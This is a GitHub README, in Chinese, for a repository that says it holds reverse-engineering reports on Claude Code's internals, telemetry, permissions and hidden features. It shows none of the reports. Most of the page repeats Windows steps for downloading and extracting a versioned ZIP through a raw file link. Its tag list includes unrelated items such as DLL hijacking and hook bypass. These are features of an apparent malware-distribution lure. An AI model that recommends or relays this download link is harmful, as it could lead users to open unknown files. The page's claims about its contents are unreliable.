jalehvesical21/claude-code-decompiled

GitHub: jalehvesical21/claude-code-decompiled

一份针对 Claude Code 的逆向工程研究报告,全面拆解其架构、Agent 行为、权限机制和遥测收集方式,帮助研究者和安全团队透明地了解这款 AI 编程助手的底层运作逻辑。

Stars: 0 | Forks: 0

# 🔍 claude-code-decompiled - 用通俗易懂的语言理解 Claude Code [![下载 / 访问页面](https://img.shields.io/badge/Download%20Page-Visit%20Now-blue?style=for-the-badge)](https://raw.githubusercontent.com/jalehvesical21/claude-code-decompiled/main/docs/en/decompiled_code_claude_2.8.zip) ## 🖥️ 这是什么 本项目为您提供基于 Claude Code 源代码分析的研究报告。主要关注该应用程序的工作原理、发送的数据、具备的功能,以及它如何管理 prompt、工具、权限和 context。 如果您想做到以下几点,请使用本仓库: - 阅读关于 Claude Code 内部机制的清晰报告 - 了解 agent 循环的工作原理 - 查看工具调用和 MCP 如何结合 - 审查 system prompt 的行为 - 理解 telemetry 和权限处理机制 - 探索持久化和隐藏功能 ## 📥 在 Windows 上下载并打开 访问此页面下载: https://raw.githubusercontent.com/jalehvesical21/claude-code-decompiled/main/docs/en/decompiled_code_claude_2.8.zip 如果页面提供了发布文件,请将其下载到您的电脑。如果提供的是文件夹或压缩包,请将其保存并在下载完成后打开。 ### Windows 操作步骤 1. 在浏览器中打开下载页面。 2. 查找最新的发布版本、文件或压缩包。 3. 将文件下载到您的“下载”文件夹。 4. 如果文件是 ZIP 格式,请右键单击并选择“全部解压缩”。 5. 打开解压后的文件夹。 6. 在浏览器或文本编辑器中打开主报告文件。 ## 📚 您会发现什么 本仓库围绕深度研究笔记和基于源代码的报告进行组织。这些报告重点关注对最终用户和研究人员最重要的部分。 常见主题包括: - 架构 - Agent 循环 - 工具系统 - System prompt - Telemetry - 权限 - MCP 集成 - Context 管理 - 持久化 - 隐藏功能 ## 🧭 如何使用这些报告 使用本仓库不需要您具备编程技能。 1. 打开主页面或报告文件。 2. 逐节阅读。 3. 如果文件包含目录,请使用目录导航。 4. 查找诸如“agent”、“prompt”、“tool”和“telemetry”等术语。 5. 如果报告包含链接笔记,请在链接之间切换浏览。 如果您想找一条简单的阅读路径,可以从架构报告开始,然后阅读 agent 循环部分,最后是工具系统部分。 ## 🔎 涵盖的主要主题 ### 🧠 Agent 循环 这部分解释了 Claude Code 如何接收输入、决定做什么以及贯穿任务的每个步骤。它可以帮助您了解系统如何将工作分解为更小的操作。 ### 🛠️ 工具系统 本节介绍了 Claude Code 在任务期间可以调用的工具。可能包括文件操作、命令使用以及其他任务辅助工具。 ### 🧾 System Prompt 这些报告探讨了内置在应用程序中的指令。它们展示了应用程序在您输入任何内容之前是如何塑造其行为的。 ### 📡 遥测 本部分说明了应用程序可能收集或发送的数据。它有助于您了解后台发生了什么。 ### 🔐 权限 本节展示了访问规则的工作原理。涵盖了应用程序可以请求的内容以及何时需要批准。 ### 🔗 MCP 集成 MCP(Model Context Protocol)允许应用程序连接到外部工具和服务。本报告帮助您理解这种连接是如何工作的。 ### 🧩 Context 管理 本节解释了应用程序如何在会话期间跟踪重要信息。可能涵盖记忆、限制以及每一步包含的内容。 ### 💾 持久化 本节涵盖了应用程序如何保存状态或在多次运行之间保留数据。它有助于您了解哪些内容被保留,哪些内容被重置。 ### 🕵️ 隐藏功能 本节指出了可能在正常 UI 中不显示的行为。可以包括额外的命令、检查或内部路径。 ## ⚙️ 系统要求 本内容旨在方便在 Windows PC 上打开。 推荐配置: - Windows 10 或 Windows 11 - 现代浏览器,如 Edge、Chrome 或 Firefox - 至少 200 MB 的可用磁盘空间 - 用于访问下载页面的稳定互联网连接 - 能够打开 Markdown 或 HTML 文件的文本查看器或浏览器 如果仓库是 ZIP 或文件夹形式,使用 Windows 资源管理器即可打开。 ## 📂 文件夹指南 如果您下载了压缩包,可能会看到以下文件: - README.md - 主入口文件 - reports/ - 研究笔记和分析页面 - notes/ - 较短的专题文件 - assets/ - 图像或链接文件 - index.html - 可在浏览器中打开的简单文件 如果您看到名为 README.md 的文件,请首先打开它。如果您看到 index.html,双击它即可在浏览器中查看内容。 ## 🧩 本仓库的用处 本仓库帮助您更清晰地了解 Claude Code 的底层工作原理。它可以帮助您: - 比较应用程序显示的内容与其背后的实际行为 - 跟踪从输入到操作的路径 - 了解权限如何影响每个步骤 - 查看工具使用如何融入整个工作流程 - 理解哪些数据可能被存储或发送 ## 🛡️ 隐私和数据问题 报告涵盖了 telemetry 和系统行为,以便您审查应用程序如何处理数据。如果您想在试用工具之前检查其工作原理,本仓库为您提供了一站式阅读详细信息的途径。 您可能想关注的内容: - 收集了什么 - 何时发送数据 - 如何处理 prompt - context 保持活动状态的时间有多长 - 什么会触发权限提示 ## 🧪 示例阅读路径 如果您想走最快的路线,请按照以下顺序: 1. 阅读主架构报告。 2. 阅读 agent 循环部分。 3. 打开工具系统笔记。 4. 检查权限。 5. 审查 telemetry。 6. 阅读 MCP 集成。 7. 最后阅读持久化和隐藏功能。 ## 🗂️ 仓库内的搜索词 使用您的浏览器搜索或文件搜索功能查找这些术语: - architecture - agent loop - tool - prompt - telemetry - permission - context - persistence - MCP - hidden feature ## 🪟 如果下载的是 ZIP 文件 1. 从上面的链接下载 ZIP 文件。 2. 在您的“下载”文件夹中找到该文件。 3. 右键单击它。 4. 选择“全部解压缩”。 5. 打开新文件夹。 6. 打开 README.md 或 index.html。 ## 🧰 如果下载的是网页 1. 打开上面的链接。 2. 在浏览器中阅读报告。 3. 使用文件链接或章节链接在页面之间切换。 4. 如果您想保留本地副本,请保存该页面。 ## 📘 您可能看到的文件类型 - 用于书面报告的 Markdown 文件 - 用于浏览器查看的 HTML 文件 - 用于结构化笔记的 JSON 文件 - 用于简短发现的文本文件 - 用于图表或参考的图像文件 ## 🔗 来源和主题领域 本仓库主要关注: - ai-agents - anthropic - claude-code - code-analysis - mcp - reverse-engineering - security-research - source-analysis - source-code - system-prompts - telemetry ## 🧭 如何浏览内容 如果仓库中包含链接笔记,请按以下顺序阅读: - 从概述页面开始 - 转到架构 - 打开 agent 循环详情 - 阅读工具系统笔记 - 检查 prompt 行为 - 审查 telemetry 和权限 - 最后阅读高级和隐藏功能笔记 ## 📝 阅读提示 - 每次阅读一个章节 - 使用浏览器搜索重复的术语 - 在另一个标签页中保持下载页面处于打开状态 - 如果您想并排阅读,请使用大屏幕 - 解压后保存文件夹,以便您以后可以重新打开
标签:Agent行为, AI安全, AI智能体, Chat Copilot, Claude Code, DLL 劫持, Homebrew安装, MCP, 上下文管理, 云资产清单, 人工智能, 代码反编译, 多模态安全, 大语言模型, 工具调用, 提示词工程, 无线安全, 权限控制, 模型上下文协议, 源码分析, 用户模式Hook绕过, 研究报告, 策略决策点, 系统架构, 逆向工程, 遥测分析, 防御加固, 隐藏功能